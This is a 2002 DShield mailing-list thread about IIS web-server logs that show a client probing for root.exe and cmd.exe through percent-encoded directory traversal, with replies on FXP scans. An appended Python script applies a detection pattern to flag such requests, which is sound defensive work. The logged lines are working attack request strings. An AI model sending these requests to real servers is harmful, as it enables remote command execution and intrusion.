[Dshield] Web server attempt

Sue Young smy at gcmlp.com
Tue Jul 2 20:02:30 GMT 2002


Luckily no 200's.  I don't run ftp or smtp on my web servers and I keep them
patched.

Sue Young


-----Original Message-----
From: Gasper, Rick [mailto:rjgasper at kings.edu] 
Sent: Tuesday, July 02, 2002 11:39 AM
To: list at dshield.org
Subject: RE: [Dshield] Web server attempt


There has been an increase of FXP type of scans. IIS seems to be vulnerable.
Are you running IIS?

Basically they set up an FTP server to FTP server file transfer. Make sure
you don't see a successful log entry result of 200 (I think); that would mean
your server has been compromised.

Rick Gasper
Manager of Network Services
King's College 
Wilkes-Barre PA 18711
Phone: 570-208-5845
Fax: 570-208-5989
rjgasper at kings.edu


-----Original Message-----
From: Sue Young [mailto:smy at gcmlp.com] 
Sent: Tuesday, July 02, 2002 10:43 AM
To: 'list at dshield.org'
Subject: [Dshield] Web server attempt

This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 404 -
2002-07-01 22:39:13 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:23 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:37 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:44 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:49 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:54 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 22:39:56 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:16 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe /c+dir 404 -
2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2002-07-01 23:11:41 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV 
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
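
The check discussed in this thread (requests for cmd.exe or root.exe, and whether any of them came back with a 200), as an added example that is not part of the original messages. The field order is assumed from the log lines quoted above, the name `triage` is hypothetical, and the sample entries are constructed with documentation addresses.

```python
import re
from collections import defaultdict

# Field order assumed from the sample lines in the post:
# date time client-ip user server-ip port method uri-stem uri-query status
LINE_RE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<client>\S+) \S+ \S+ \d+ (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})\b"
)

# Markers taken from the logged requests: command interpreters asked for
# over HTTP, and percent-encoded directory traversal.
PROBE_RE = re.compile(r"cmd\.exe|root\.exe|\.\.%5c|\.\.%2f", re.IGNORECASE)

# Constructed sample entries (documentation addresses, not from the post).
SAMPLE = [
    "2002-07-01 22:39:02 192.0.2.10 - 198.51.100.5 80 GET /scripts/root.exe /c+dir 404 -",
    "2002-07-01 22:39:18 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -",
    "2002-07-01 22:39:23 192.0.2.10 - 198.51.100.5 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -",
    "2002-07-01 22:40:00 192.0.2.77 - 198.51.100.5 80 GET /index.html - 200 -",
    "2002-07-01 22:41:07 192.0.2.99 - 198.51.100.5 80 GET /scripts/root.exe /c+dir 200 -",
]

def triage(lines):
    """Count probe requests per client and list any answered with a 2xx."""
    report = defaultdict(lambda: {"probes": 0, "statuses": defaultdict(int), "served": []})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m is None or not PROBE_RE.search(m["stem"]):
            continue  # unparseable line or ordinary request
        entry = report[m["client"]]
        entry["probes"] += 1
        entry["statuses"][m["status"]] += 1
        if m["status"].startswith("2"):
            # The server served the request instead of rejecting it.
            entry["served"].append(f'{m["date"]} {m["time"]} {m["stem"]}')
    return report

if __name__ == "__main__":
    for client, entry in sorted(triage(SAMPLE).items()):
        print(client, entry["probes"], dict(entry["statuses"]))
        for hit in entry["served"]:
            print("  INVESTIGATE:", hit)
```
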
